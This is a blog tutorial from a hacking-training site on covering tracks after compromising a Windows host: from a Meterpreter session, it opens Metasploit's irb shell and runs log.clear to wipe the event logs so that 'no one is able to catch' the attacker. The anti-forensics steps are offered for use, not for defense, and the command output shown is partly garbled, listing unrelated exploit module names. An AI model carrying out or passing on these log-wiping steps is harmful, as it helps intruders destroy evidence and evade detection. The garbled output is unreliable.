Remove Event Log – Cover Track After Hacking Metasploit

There are so many ways to hack into a computer but after comprising the computer an attacker (hacker) needs to cover their track because each and every activity that a hacker do (or a normal user do) is recorded by the system. So whenever a hacker hack into a web server or a computer than after doing the work an attacker usually cover the track so that no one is able to catch them. How to cover your track after hacking or how a hacker cover their track is an important topic of discussion and need more tutorial because every operating system has its own way to maintain the logs.
Log files contain the information of every activity that has been done on a computer so it is very important to remove this log file. There are different way to remove log files on windows, Linux and MAC but in this tutorial I will show you how to remove event log management by using Metasploit post exploitation tutorial for windows.


  • Metasploit (Backtrack 5 r1 using for tutorial, you can use some other too)
  • A compromised host (it is very easy to hack into windows by using metasploit, as discussed before if you don’t know how than let us know I will share the link of the previous tutorial)
  • A brain
Now let suppose you have hacked a windows operating system and you have a meterpreter session than you can do multiple things via meterpreter session like you can cover your track by removing the log file. The picture below shows that how a windows maintain logs that an attacker need to remove.

On our meterpreter session we need to call a post exploitation script that is available and has been given with metasploit (you can create some more script too). Lets call irb

meterpreter > irb
[*] Starting IRB shell
[*] The ‘client’ variable holds the meterpreter client
>> client.sys.config.sysinfo()
=> {“Computer”=>”VIRTUAL-7C33D2A”, “OS”=>”Windows XP (Build 2600, Service Pack 2).”, “Architecture”=>”x86”, “System Language”=>”en_US”}

Than we need to clear the log it requires an easy command.

>> log.clear
=> #<#:0xb6779424 @client=#>,
/trendmicro_serverprotect_earthagent”=>#, “windows/browser/ie_iscomponentinstalled”=>#, “windows/exec/reverse_ord_tcp”=>#, “windows/http/apache_chunked”=>#, “windows/imap/novell_netmail_append”=>#

Thats it.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Top Tips To Avoid Getting Scammed In Sports Wagering Sites

If you’re a sports fan, you’ve probably wanted to dabble into the world of sports wagering. Who wouldn’t? Just the idea of being able...

5 Security Apps to Protect your Phone from Hackers

Our phones are much more than just communication devices these days. They save all of our personal, financial, and private information. Losing access to...

Ways to Improve Internet Speed

A slow-speed internet that makes you wait for ages before you can finally access a webpage is surely quite a pain! It tests your...

How to Reduce Risk with Runtime Application Self Protection

Instead of waning, cyber attacks continue to rise as the years pass. Several reasons contribute to this phenomenon, despite developing and deploying more robust...